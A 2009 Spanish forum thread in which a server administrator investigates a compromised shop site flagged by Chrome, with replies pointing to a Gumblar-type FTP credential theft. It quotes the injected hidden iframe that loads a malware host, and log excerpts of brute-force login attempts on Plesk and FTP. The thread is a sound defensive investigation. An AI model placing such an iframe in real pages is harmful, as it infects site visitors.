xg8.in

Buenas noches.

Hoy, al intentar acceder a uno de las tiendas que alojo en mi servidor, me salta el chrome con lo siguiente:

Navegación segura
Página de diagnóstico para xg8.in

¿Cuál es el estado actual de xg8.in?
Este sitio aparece como sospechoso: la visita a este sitio web puede dañar su equipo.

Parte de este sitio ha sido marcado 2veces por actividad sospechosa durante los últimos 90 días.

¿Qué ocurrió cuando Google visitó este sitio?
De las 1 páginas analizadas en el sitio durante los últimos 90 días, 0 página(s) contenía(n) software malicioso que había sido descargado e instalado sin el permiso del usuario. Google visitó este sitio por última vez el 2009-08-14, y se encontró contenido sospechoso en este sitio por última vez el 2009-08-14.
This site was hosted on 10 network(s) including AS16276 (OVH), AS21409 (IKOULA), AS29550 (EUROCONNEX).

¿Ha actuado el sitio como intermediario dando lugar a una mayor difusión de software malicioso?
No parece que, durante los últimos 90 días, xg8.in haya actuado como intermediario en la infección de sitios.

¿Ha alojado este sitio software malicioso?
Sí, el sitio ha alojado software malicioso durante los últimos 90 días. Infectó 111 dominio(s), entre los que se incluyen mooga.co.kr/, collegeskerala.com/, rotaaerea.com.br/.

¿Cómo ha ocurrido?
En algunos casos, existen terceras partes que añaden códigos malignos a sitios legítimos, lo que nos puede llevar a mostrar un mensaje de advertencia.

Próximos pasos:
Vuelve a la página anterior.

Con las mismas, veo que todos los index.html e index.php del sitio en cuestión tienen fecha y hora diferente al resto de los ficheros y que a todos se les ha añadido esta línea:

<iframe src="hachettp://xg8.in:8080/index.php" width=177 height=101 style="visibility: hidden"></iframe>
(no puedo publicar enlaces todavía)

He buscado en el google lo del xg8.in, pero no encuentro nada.

¿Alguien sabe de qué va esto?

Voy a revisar los logs del plesk a ver si veo algo más.

Gracias por adelantado.

 

Hola pacomar,

¿El sistema operativo del servidor es Windows? A simple vista esa máquina tiene un troyano que inyecta el código a todos los index.php/html.

 

Hola.

Sí, efectivamente es un windows, pero si fuera un troyano, ¿por qué sólo los index de ese dominio y no los demás dominios alojados?

De todas formas e pasaré otro antivirus por si acaso.

Gracias.

 

Pasa también un antivirus a tu PC, o a los equipos que tengan acceso por FTP a ese servidor:
http://www.google.es/#hl=es&q=gumbler+virus&meta=&fp=d16d0e600623f65c

Es posible que te hayan robado, te estén robando, los datos de acceso y usándolos para entrar por FTP y alterar los index.*, sólo tocan ese tipo de ficheros. Revisa los logs del servidor FTP y verás el acceso, o los accesos, porque suelen entrar desde varios sitios casi simultáneamente.

 

Hola de nuevo.

Revisando los log del plesk, fuera de lo habitual me encuentro con lo siguiente:

221.4.221.156 - - [11/Aug/2009:12:59:11 +0200] "POST /login_up.php3?login_name=admin&passwd=setup HTTP/1.1" 200 7801
221.4.221.156 - - [11/Aug/2009:12:59:12 +0200] "POST /login_up.php3?login_name=admin&passwd=1q2w3e HTTP/1.1" 200 7801
221.4.221.156 - - [11/Aug/2009:12:59:13 +0200] "POST /login_up.php3?login_name=admin&passwd=1q2w3e4r HTTP/1.1" 200 7801

(Algún chino que no tiene otra cosa mejor que hacer)

Para evitar este tipo de ataque, he de deciros que tengo habilitadas en el plesk las ip´s desde las que solo debería dejar que me conectase y está probado que de una ip que no está en la lista no me deja.

Y para solucionar lo del acceso indeseado por ftp, ¿alguien sabe si se puede deshabilitar en plesk la cuenta ftp de un dominio en concreto?

También he buscado conexiones que coincidan con la hora y fecha de modificación de los index -24/07/2009 07:45 - pero los dos más cercanos que he encontrado en esa fecha no se corresponden con la hora:

66.249.71.23 - - [24/Jul/2009:03:17:22 +0200] "GET / HTTP/1.1" 200 840

80.25.215.101 - - [24/Jul/2009:08:49:08 +0200] "GET /javascript/promo-flags.js.php HTTP/1.1" 200 75

He pasado al server la versión 4 del NOD antivirus y nada, sólo aparece el radmin como potencialmente peligroso. Ahora estoy con el equipo desde el que me conecto a ver qué pasa.

He leído algún post de otro hilo donde alguien decía que hay versiones del dreamweaver con .... ¿troyanos incluidos que se enviarían al server al subir los ficheros y que se pondrían en marcha aleatoriamente?

 

Esos logs que muestras son del servidor web, ¿has mirado los del servidor FTP?

 

Pues aquí está una parte del log. No sé por qué sólo aparece el día 15, pero lo que sí está claro es que hay alguna maquinilla (en este caso en los USA) intentando romper el password de la cuenta FTP de este dominio en concreto, cosa que posiblemente haya conseguido.

Para controlar mejor el acceso, he cambiado la programación del log que estaba a "diario" a "cada hora" y también he habilitado el asunto de las ip´s desde las que sólo puedo (creo) acceder al ftp del server. Ya os contaré como termina esta película.

También quiero en cuanto pueda preparar una máquina que pueda formatear después, conectarme al sitio que indicaba el script de los index a ver de qué va, más que nada por simple curiosidad.

#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-08-15 08:23:40
#Fields: date time c-ip cs-username s-sitename s-computername s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie) cs(Referer)

2009-08-15 08:23:40 74.223.143.131 anonymous MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER anonymous - 331 0 0 0 0 FTP - - - -
2009-08-15 08:23:40 74.223.143.131 - MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]PASS piway1409ArrobAyahoo.com - 530 1326 0 0 0 FTP - - - -
2009-08-15 08:23:40 74.223.143.131 Administrator MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER Administrator - 331 0 0 0 0 FTP - - - -
2009-08-15 08:23:40 74.223.143.131 - MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]PASS - - 530 1326 0 0 16 FTP - - - -
2009-08-15 08:23:40 74.223.143.131 Administrator MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER Administrator - 331 0 0 0 0 FTP - - - -
2009-08-15 08:23:51 74.223.143.131 upload MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER upload - 331 0 0 0 0 FTP - - - -
2009-08-15 08:23:51 74.223.143.131 - MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]PASS - - 530 1326 0 0 0 FTP - - - -

2009-08-15 08:24:03 74.223.143.131 admin MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER admin - 331 0 0 0 0 FTP - - - -
2009-08-15 08:24:03 74.223.143.131 - MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]PASS - - 530 1326 0 0 0 FTP - - - -

2009-08-15 08:24:17 74.223.143.131 web MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]USER web - 331 0 0 0 0 FTP - - - -
2009-08-15 08:24:17 74.223.143.131 - MSFTPSVC22717 2KSERVICES 84.232.33.220 21 [1]PASS - - 530 1326 0 0 0 FTP - - - -


Saludos a todos y gracias por la ayuda.